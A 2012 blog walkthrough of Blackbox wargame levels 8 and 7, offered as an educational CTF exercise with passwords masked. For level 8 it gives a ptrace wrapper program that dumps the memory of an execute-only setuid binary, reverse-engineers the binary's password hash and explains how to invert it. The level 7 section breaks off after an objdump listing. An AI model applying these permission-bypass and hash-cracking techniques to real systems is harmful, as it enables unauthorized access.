Saturday, January 28, 2012

Blackbox - chapter 8

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Let's see what level 8 holds in store:
$ ssh -p 2225 level8@blackbox.smashthestack.org
level8@blackbox.smashthestack.org's password:
...
level8@blackbox:~$ ls -l
total 16
-rw-r--r-- 1 root   root      10 2008-01-24 05:58 password
-rws--x--x 1 level9 level9 12254 2007-12-29 14:10 secrets
Wait a minute here, what's that? We only have execution permissions for secrets.
How can we analyze it if we can't even read it?
Well, there is a way, using ptrace sorcery. I won't go into too much depth here, so I recommend you read Playing with ptrace, Part I (I'd also recommend you read part II, just for general knowledge).
Anyway, to summarize these articles, the way debuggers work is by forking, invoking ptrace with PTRACE_TRACEME in the child, and then executing the to-be-traced process. The parent process can then control the child process and read its status using other ptrace calls.
So let's write a little program that does just that, with secrets as the child process, and reads the memory contents of the child. This is how we can cheat the permission mechanism.
level8@blackbox:/tmp$ cat > wrap.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/wait.h>   /* needed for wait() */
#include <unistd.h>

int main(int argc, char *argv[])
{
    int pid;
    char *prog[] = {"/home/level8/secrets", NULL};
    long addr;
    long size;
    int i = 0;
    int val;
    struct user_regs_struct regs;
    if (argc != 3) {
        printf("Usage: %s <address> <number of long words>\n", argv[0]);
        return 1;
    }
    addr = strtoul(argv[1], NULL, 16);
    size = strtoul(argv[2], NULL, 10);
    pid = fork();
    if (0 == pid) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execve(prog[0], prog, NULL);
    } else {
        wait(NULL);
        for (i = 0; i < size; ++i) {
            val = ptrace(PTRACE_PEEKTEXT, pid, addr + 4*i, NULL);
            printf("%02x", val & 0xFF);
            printf("%02x", (val >> 8) & 0xFF);
            printf("%02x", (val >> 16) & 0xFF);
            printf("%02x", (val >> 24) & 0xFF);
        }
        printf("\n");
        ptrace(PTRACE_KILL, pid, NULL, NULL);
    }
    return 0;
}

level8@blackbox:/tmp$ gcc -o wrap wrap.c
As you can see, the child just invokes ptrace with PTRACE_TRACEME and executes the level's program.
The parent waits for the child to stop, and then reads the specified number of long words from the specified address, prints them out encoded as a hex string, and then kills the child.
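The byte order of that hex string deserves a quick illustration. On little-endian x86, the lowest byte of each long word returned by PTRACE_PEEKTEXT is the first byte in memory, which is why wrap.c prints the low byte first. Here is a minimal Python sketch of the same encoding; the helper name word_to_hex is made up for this example:

```python
import struct


def word_to_hex(word: int) -> str:
    """Encode a 32-bit word as hex in memory (little-endian) order."""
    return struct.pack("<I", word & 0xFFFFFFFF).hex()


# A word read as 0x53e58955 holds the bytes 55 89 e5 53 in memory,
# i.e. push ebp / mov ebp,esp / push ebx.
sample_word = 0x53E58955
print(word_to_hex(sample_word))
```

Printing the high byte first instead would give 53e58955, which no disassembler would recognize as a function prologue.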
Let's try out our new toy. But which address interests us? Well, main in the previous level's binary started at 0x08048464, so that is a reasonable first guess. As for the number of long words to read, let's pick a generous 200 (800 bytes); I'm sure main isn't too long:
level8@blackbox:/tmp$ ./wrap 0x08048464 200
5589e55381ec3404000083e4f0b80000000029c4c745f464870408c7042475870408e8cdfeffff8945f0c
785e4fbffff000000008b45f0890424e8c5feffff483985e4fbffff734781bde4fbfffffb0300007602eb
398d85e8fbffff89c3039de4fbffff8b85e4fbffff0345f08d48018b85e4fbffff0345f00fb6100fb6012
8d0045a88038d85e4fbffffff00eba58d85e8fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600c0
f804240f042188028d85e9fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600240f042188028d85e
afbffff0385e4fbffffc60000c785e4fbffff000000008d85e8fbffff890424e80bfeffff483985e4fbff
ff7205e99b0000008d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4fbffff8d85e9fbffff0
385e4fbffff0fb600320288018d85e9fbffff89c1038de4fbffff8d85e9fbffff89c20395e4fbffff8d85
e8fbffff0385e4fbffff0fb600320288018d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4f
bffff8d85e9fbffff0385e4fbffff0fb600320288018d85e4fbffff830002e949ffffff8d95e8fbffff8b
45f489442404891424e81dfdffff85c0751ac7042492870408e85dfdffffc704249b870408e811fdffffe
b0cc70424a3870408e843fdffffb8000000008b5dfcc9c3905589e5575631f65383ec0ce8a000000081c3
44120000e8a5fcffff8d9314ffffff8d8314ffffff29c2c1fa0239d6731c89d78db426000000008dbc270
0000000ff94b314ffffff4639fe72f483c40c5b5e5f5dc38db6000000008dbf000000005589e583ec0889
1c24e84200000081c3e6110000897424048d8314ffffff8d9314ffffff29d0c1f80285c08d70ff7510e85
b0000008b1c248b74240489ec5dc3ff94b314ffffff89f04e85c075f2ebe08b1c24c39090909090909090
909090905589e55383ec04bb90980408a19098040883f8ff74168d76008dbc270000000083eb04ffd08b0
383f8ff75f4585b5dc35589e553e8000000005b81c35b11000052e89afcffff8b5dfcc9c3000300000001
000200555b5b5a526357666358564d246c222300506c6561736520656e74657220796f
Now, to disassemble this I will use ndisasm, the disassembler that ships with nasm, which is not installed on the blackbox server. First I'll decode the hex string into a binary file which I will call main.bin, and then I will disassemble it at the base address of main:
~$ ndisasm -u -o 0x08048464 main.bin |cat -n|grep ret
   124 0804864E  C3                ret
   154 080486A3  C3                ret
   176 080486EF  C3                ret
   184 08048703  C3                ret
   215 0804873F  C3                ret
   226 0804875A  C3                ret
~$ ndisasm -u -o 0x08048464 main.bin | head -n 124
08048464  55                push ebp
08048465  89E5              mov ebp,esp
08048467  53                push ebx
08048468  81EC34040000      sub esp,0x434
0804846E  83E4F0            and esp,byte -0x10
08048471  B800000000        mov eax,0x0
08048476  29C4              sub esp,eax
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
080484F3  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[ebp-0x41c]
08048501  8B85E4FBFFFF      mov eax,[ebp-0x41c]
08048507  0345F0            add eax,[ebp-0x10]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
08048516  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[ebp-0x41c]
08048524  8B85E4FBFFFF      mov eax,[ebp-0x41c]
0804852A  0345F0            add eax,[ebp-0x10]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
08048536  8D85EAFBFFFF      lea eax,[ebp-0x416]
0804853C  0385E4FBFFFF      add eax,[ebp-0x41c]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
0804854F  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [ebp-0x41c],eax
08048564  7205              jc 0x804856b
08048566  E99B000000        jmp dword 0x8048606
0804856B  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[ebp-0x41c]
08048579  8D85E8FBFFFF      lea eax,[ebp-0x418]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[ebp-0x41c]
08048587  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804858D  0385E4FBFFFF      add eax,[ebp-0x41c]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485A8  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[ebp-0x41c]
080485B6  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485BC  0385E4FBFFFF      add eax,[ebp-0x41c]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485D7  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[ebp-0x41c]
080485E5  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485EB  0385E4FBFFFF      add eax,[ebp-0x41c]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
080485F8  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
08048606  8D95E8FBFFFF      lea edx,[ebp-0x418]
0804860C  8B45F4            mov eax,[ebp-0xc]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
0804861F  C7042492870408    mov dword [esp],0x8048792
08048626  E85DFDFFFF        call dword 0x8048388
0804862B  C704249B870408    mov dword [esp],0x804879b
08048632  E811FDFFFF        call dword 0x8048348
08048637  EB0C              jmp short 0x8048645
08048639  C70424A3870408    mov dword [esp],0x80487a3
08048640  E843FDFFFF        call dword 0x8048388
08048645  B800000000        mov eax,0x0
0804864A  8B5DFC            mov ebx,[ebp-0x4]
0804864D  C9                leave
0804864E  C3                ret
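For reference, the decoding step that produced main.bin can be sketched in a few lines of Python 3. This is only one way to do it; the function names and the idea of pasting the dump as wrapped lines are assumptions of this example:

```python
def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a (possibly line-wrapped) hex string into raw bytes."""
    # Remove all whitespace so wrapped lines are joined back together.
    return bytes.fromhex("".join(dump.split()))


def write_binary(path: str, dump: str) -> None:
    """Write the decoded bytes to a file, e.g. main.bin."""
    with open(path, "wb") as out:
        out.write(hex_dump_to_bytes(dump))


# The first bytes of the dump, wrapped over two lines on purpose.
prologue = hex_dump_to_bytes("5589e553\n81ec3404")
print(prologue.hex())
```

Calling write_binary("main.bin", dump) with the full output of wrap then gives ndisasm a file to work on.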
I hope you don't mind that we switched from the gas (AT&T) syntax to the Intel syntax, but it's good to learn to read both.
Anyway, since we disassembled raw code, we don't have any symbolic information, so we are going to have to guess what each function is based on context. So let's start:
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
This loads the local variable at ebp-0xc with some constant which looks like an address in the data section. Let's use our tool again to read what's in that address.
level8@blackbox:/tmp$ ./wrap 0x08048764 10
555b5b5a526357666358564d246c222300506c6561736520656e74657220796f7572207061737377
See the 00 there? I suspect it is a string terminator, let's see what that string is:
level8@blackbox:/tmp$ python -c "print '%r' % '555b5b5a526357666358564d246c\
2223'.decode('hex')"
'U[[ZRcWfcXVM$l"#'
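The one-liner above relies on Python 2 (the print statement and the 'hex' codec). A rough Python 3 equivalent, which also cuts the dump at the first 00 byte automatically, might look like this; the helper name first_c_string is invented for this sketch:

```python
def first_c_string(hex_dump: str) -> str:
    """Decode a hex dump and return the text before the first NUL byte."""
    raw = bytes.fromhex(hex_dump)
    return raw.split(b"\x00", 1)[0].decode("ascii")


# The 40 bytes that wrap printed for address 0x08048764.
dump = ("555b5b5a526357666358564d246c2223"
        "00506c6561736520656e74657220796f7572207061737377")
print(repr(first_c_string(dump)))
```

The same helper works unchanged on the other dumps in this post, since they are all NUL-terminated C strings.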
Odd string...seems like gibberish, we'll give ebp-0xc the name gibberish then. Let's continue, it might make more sense later:
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
This is a function call with one parameter, which also looks like an address in the data section:
level8@blackbox:/tmp$ ./wrap 0x08048775 10
506c6561736520656e74657220796f75722070617373776f72643a200057656c636f6d650a002f62
Again, I spot another string terminator, so let's decode the string:
level8@blackbox:/tmp$ python -c "print '%r' % '506c6561736520656e7465722079\
6f75722070617373776f72643a20'.decode('hex')"
'Please enter your password: '
Aha, a prompt. It also looks like the return value is stored in the stack at ebp-0x10. This means that this is not some regular printf or puts.
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
That's some sort of initialization of a variable at ebp-0x41c.
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
This executes a mystery function on whatever was stored in ebp-0x10 (the return from that prompt function), subtracts 1 from the return value and compares the result to the variable at ebp-0x41c. Sort of like this:
if (var_41c >= (func(var_10) - 1)) goto 0x80484f3
Let's call that address label1 from now on, in case we see it again.
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
This compares var_41c to the constant 0x3fb, and jumps to some new location if it is below or equal, or to label1 otherwise. Equivalent C code:
if (var_41c <= 0x3fb) goto 0x80484ba
else goto label1
Let's call the new address label2.
For the next piece of code, notice it starts at label2, I'll just annotate it:
label2:
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
What happens here is this, and you can verify it yourself:
var_418[var_41c] = var_10[var_41c + 1] - var_10[var_41c] + 0x5a;
var_41c++;
This tells us several things:
  1. var_41c is some sort of index, from now on we will call it idx.
  2. var_418 is some temporary buffer in the stack, we'll call it buf.
  3. var_10, which was returned from the prompt function, is a pointer to some input, most probably the user input, and the prompt function is a prompt-and-read function. We will call it input.
At the end of that section, there's a jump to 0x8048498 which we will call label3. We've already been there, it's the piece that contained the mystery function. Let's rewrite it, but with more meaningful names and see if it sheds some new light:
if (idx >= (func(input) - 1)) goto label1
else if (idx <= 0x3fb) goto label2
else goto label1
I think we can spot what's happening here: the mystery function func is actually strlen, and this is part of a while statement:
while ((idx < strlen(input) - 1) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}
/* do label1 stuff */
OK, let's see what happens at label1 (I'm going to start annotating the code with variable names):
label1:
080484F3  8D85E8FBFFFF      lea eax,[buf]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[idx]
08048501  8B85E4FBFFFF      mov eax,[idx]
08048507  0345F0            add eax,[input]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
This translates to:
buf[idx] = 0x21 + ((input[idx] >> 4) & 0xf);
The next chunk:
08048516  8D85E9FBFFFF      lea eax,[buf+1]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[idx]
08048524  8B85E4FBFFFF      mov eax,[idx]
0804852A  0345F0            add eax,[input]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
Which translates to:
buf[idx + 1] = 0x21 + (input[idx] & 0xf);
Next we have:
08048536  8D85EAFBFFFF      lea eax,[buf+2]
0804853C  0385E4FBFFFF      add eax,[idx]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [idx],0x0
         -0000
This is equivalent to:
buf[idx + 2] = 0;
idx = 0;
This looks like something string-like was terminated, and the index was reset, probably for a second pass. Let's see what happens next:
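To make the two nibble assignments concrete, here is a small Python sketch on an arbitrary sample byte (the letter b, chosen only for illustration; the helper names are made up). Note that the mask is applied before 0x21 is added, matching the order of the and and add instructions, so the grouping has to be 0x21 + (x & 0xf); without the parentheses + binds tighter than &, in Python just as in C.

```python
def encode_last_byte(b: int) -> bytes:
    """Split a byte into two nibbles and shift each into printable range."""
    high = 0x21 + ((b >> 4) & 0xF)
    low = 0x21 + (b & 0xF)
    return bytes([high, low])


def decode_last_byte(pair: bytes) -> int:
    """Undo encode_last_byte: recombine the two nibbles into one byte."""
    return ((pair[0] - 0x21) << 4) | (pair[1] - 0x21)


sample = ord("b")  # 0x62, an arbitrary example value
encoded = encode_last_byte(sample)
print(encoded, hex(decode_last_byte(encoded)))

# Dropping the inner parentheses masks the sum instead of the nibble.
wrong = 0x21 + (sample >> 4) & 0xF
print(wrong)
```

Each encoded byte lands in the range 0x21 to 0x30, so the result is always printable and never contains a string terminator.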
0804854F  8D85E8FBFFFF      lea eax,[buf]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368 [strlen]
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [idx],eax
08048564  7205              jc 0x804856b [label4]
08048566  E99B000000        jmp dword 0x8048606 [label5]
Translated to C:
if (idx < strlen(buf) - 1) goto label4;
else goto label5;
The next piece of code starts at label4, and has a repeating pattern, so I'll paste it all at once:
label4:
0804856B  8D85E8FBFFFF      lea eax,[buf]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[idx]
08048579  8D85E8FBFFFF      lea eax,[buf]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[idx]
08048587  8D85E9FBFFFF      lea eax,[buf+1]
0804858D  0385E4FBFFFF      add eax,[idx]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[buf+1]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[idx]
080485A8  8D85E9FBFFFF      lea eax,[buf+1]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[idx]
080485B6  8D85E8FBFFFF      lea eax,[buf]
080485BC  0385E4FBFFFF      add eax,[idx]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[buf]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[idx]
080485D7  8D85E8FBFFFF      lea eax,[buf]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[idx]
080485E5  8D85E9FBFFFF      lea eax,[buf+1]
080485EB  0385E4FBFFFF      add eax,[idx]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
Which is:
buf[idx] = buf[idx] ^ buf[idx + 1];
buf[idx + 1] = buf[idx] ^ buf[idx + 1];
buf[idx] = buf[idx] ^ buf[idx + 1];
That's just the code for swapping bytes.
Next we have:
080485F8  8D85E4FBFFFF      lea eax,[idx]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
Which increments the index by 2 and then jumps back to the index comparison, which makes it look like another loop:
for (idx = 0; idx < strlen(buf) - 1; idx += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}
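If the three XOR lines look like magic, the following Python sketch replays them on a sample buffer. It assumes the buffer contains no zero bytes, so that len() can stand in for strlen(); the function name is invented for this example.

```python
def swap_pairs_xor(buf: bytearray) -> None:
    """Swap every two consecutive bytes in place using three XORs."""
    idx = 0
    while idx < len(buf) - 1:
        buf[idx] ^= buf[idx + 1]      # buf[idx] now holds a ^ b
        buf[idx + 1] ^= buf[idx]      # b ^ (a ^ b) == a
        buf[idx] ^= buf[idx + 1]      # (a ^ b) ^ a == b
        idx += 2


sample = bytearray(b"abcde")
swap_pairs_xor(sample)
print(sample)
```

With an odd number of bytes the last one has no partner and stays where it is.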
Next is the code that gets executed when the loop is exhausted:
label5:
08048606  8D95E8FBFFFF      lea edx,[buf]
0804860C  8B45F4            mov eax,[gibberish]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
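I think by this time you've figured out what's happening here: gibberish is a password hash, what the program has done so far is hash the input password, and this is where the two get compared. The call at 0x8048338 takes both strings and its result is tested against zero, so it is most likely strcmp.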
I won't continue analyzing the code anymore, because that's enough. Let's combine all the little pieces of C code and see what we can do:
while ((idx < strlen(input) - 1) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}

buf[idx] = 0x21 + ((input[idx] >> 4) & 0xf);
buf[idx + 1] = 0x21 + (input[idx] & 0xf);
buf[idx + 2] = 0;

for (idx = 0; idx < strlen(buf) - 1; idx += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}
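For experimenting off the server, the combined routine can be modeled in Python. This is a sketch under a few assumptions: the input is non-empty, none of the intermediate bytes is zero (so strlen(buf) equals the buffer length), and the first loop stops at strlen(input) - 1 as the dec eax before the comparison in the disassembly indicates. The name hash_password is made up.

```python
def hash_password(password: bytes) -> bytes:
    """Python model of the three stages reconstructed from the disassembly."""
    idx = 0
    buf = bytearray()
    # Stage 1: difference of neighbouring bytes, offset by 0x5a.
    while idx < len(password) - 1 and idx <= 0x3FB:
        buf.append((password[idx + 1] - password[idx] + 0x5A) & 0xFF)
        idx += 1
    # Stage 2: the byte at idx is stored as two nibbles, each plus 0x21.
    last = password[idx]
    buf.append(0x21 + ((last >> 4) & 0xF))
    buf.append(0x21 + (last & 0xF))
    # Stage 3: swap every two consecutive bytes.
    for i in range(0, len(buf) - 1, 2):
        buf[i], buf[i + 1] = buf[i + 1], buf[i]
    return bytes(buf)


print(hash_password(b"ab"))
```

A hash is always one byte longer than its input, so the 16-character string stored in the binary corresponds to a 15-character password.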
Well, we know the hashing algorithm, and we know the hashed password. We can now invert the hash and obtain the original password.
That should be easy, working backwards:
  1. Unswap every two consecutive bytes in the hash.
  2. Take the last two bytes, subtract 0x21 from them, and recombine them to a single byte, one being the high nibble, and the other the low nibble. Now we know the last input byte, input[N], where N = strlen(input) - 1.
  3. Reversing the formula for buf inside the while loop gives a recurrence for the input, applied from i = N - 1 down to 0: input[i] = input[i + 1] - buf[i] + 0x5a.
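The three steps can be tried out on a made-up password without touching the real hash. The sketch below includes a small model of the forward hash purely so the round trip can be checked; all names are hypothetical, and it assumes a non-empty input and no zero bytes in the intermediate buffer.

```python
def swap_pairs(data: bytes) -> bytes:
    """Swap every two consecutive bytes; the operation is its own inverse."""
    out = bytearray(data)
    for i in range(0, len(out) - 1, 2):
        out[i], out[i + 1] = out[i + 1], out[i]
    return bytes(out)


def toy_hash(password: bytes) -> bytes:
    """Forward direction, as reconstructed from the disassembly."""
    buf = bytearray((password[i + 1] - password[i] + 0x5A) & 0xFF
                    for i in range(len(password) - 1))
    buf.append(0x21 + ((password[-1] >> 4) & 0xF))
    buf.append(0x21 + (password[-1] & 0xF))
    return swap_pairs(bytes(buf))


def invert(hashed: bytes) -> bytes:
    buf = swap_pairs(hashed)                      # step 1: unswap
    n = len(buf) - 1                              # length of the input
    out = bytearray(n)
    out[n - 1] = ((buf[-2] - 0x21) << 4) | (buf[-1] - 0x21)  # step 2
    for i in range(n - 2, -1, -1):                # step 3: recurrence
        out[i] = (out[i + 1] - buf[i] + 0x5A) & 0xFF
    return bytes(out)


made_up = b"example!"  # not the real password, just a test value
print(invert(toy_hash(made_up)))
```

Feeding the real hash string to invert is the part that remains as an exercise.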
I think I'll leave it to you to write a script and obtain the password yourselves.
I'll check if it works:
level8@blackbox:~$ ./secrets
Please enter your password: 
Welcome
sh-3.1$
Just one last level to go ;)

Blackbox - chapter 7

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Level 7. There we go again:
$ ssh -p 2225 level7@blackbox.smashthestack.org
level7@blackbox.smashthestack.org's password:
...
level7@blackbox:~$ ls -l
total 12
-rwsr-xr-x 1 level8 level8 7851 2008-04-21 18:26 heybabe
-rw-r--r-- 1 root   level7   10 2008-01-24 05:56 passwd
No source, so like the previous time, let's start with dumping the data:
level7@blackbox:~$ objdump -s --section=.rodata heybabe

heybabe:     file format elf32-i386

Contents of section .rodata:
 80486b0 03000000 01000200 75736167 653a2025  ........usage: %
 80486c0 73203c61 72673e0a 00000000 54726163  s <arg>.....Trac
 80486d0 696e6720 64657465 63746564 203a2920  ing detected :) 
 80486e0 736f7272 79202e2e 2e2e2e00 544f5547  sorry ......TOUG
 80486f0 48205348 49542100 57616c6b 20746865  H SHIT!.Walk the
 8048700 20776179 206f6620 74686520 31333337   way of the 1337
 8048710 206f6e65 2100                         one!.
As before, here is a summary of the strings and their addresses:
80486b8: usage: %s <arg>\n
80486cc: Tracing detected :) sorry .....
80486ec: TOUGH SHIT!
80486f8: Walk the way of the 1337 one!
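The addresses in this summary can be double-checked mechanically. The Python sketch below takes the hex columns of the objdump output above, together with the section's start address, and lists every NUL-terminated run of at least four bytes; the function name and the minimum-length cutoff are choices made for this example.

```python
RODATA_BASE = 0x80486B0
RODATA_HEX = (
    "0300000001000200" "75736167653a2025"
    "73203c6172673e0a" "0000000054726163"
    "696e672064657465" "63746564203a2920"
    "736f727279202e2e" "2e2e2e00544f5547"
    "4820534849542100" "57616c6b20746865"
    "20776179206f6620" "7468652031333337"
    "206f6e652100"
)


def c_strings(data: bytes, base: int, min_len: int = 4) -> dict:
    """Map start address to text for each NUL-terminated run in data."""
    found = {}
    start = 0
    for i, byte in enumerate(data):
        if byte == 0:
            if i - start >= min_len:
                found[base + start] = data[start:i].decode("ascii")
            start = i + 1
    return found


strings = c_strings(bytes.fromhex(RODATA_HEX), RODATA_BASE)
for address, text in strings.items():
    print(f"{address:x}: {text!r}")
```

The cutoff of four bytes is only there to skip the two small integers at the start of the section.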
Now we'll disassemble main:
level7@blackbox:~$ objdump -d heybabe|grep -A80 "<main>:"
08048464 <main>:
 8048464: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048468: 83 e4 f0              and    $0xfffffff0,%esp
 804846b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804846e: 55                    push   %ebp
 804846f: 89 e5                 mov    %esp,%ebp
 8048471: 57                    push   %edi
 8048472: 51                    push   %ecx
 8048473: 81 ec 10 04 00 00     sub    $0x410,%esp
 8048479: 89 8d 04 fc ff ff     mov    %ecx,0xfffffc04(%ebp)
 804847f: 8b 85 04 fc ff ff     mov    0xfffffc04(%ebp),%eax
 8048485: 83 38 02              cmpl   $0x2,(%eax)
 8048488: 74 27                 je     80484b1 <main+0x4d>
 804848a: 8b 95 04 fc ff ff     mov    0xfffffc04(%ebp),%edx
 8048490: 8b 42 04              mov    0x4(%edx),%eax
 8048493: 8b 00                 mov    (%eax),%eax
 8048495: 89 44 24 04           mov    %eax,0x4(%esp)
 8048499: c7 04 24 b8 86 04 08  movl   $0x80486b8,(%esp)
 80484a0: e8 cf fe ff ff        call   8048374 <printf@plt>
 80484a5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ac: e8 d3 fe ff ff        call   8048384 <exit@plt>
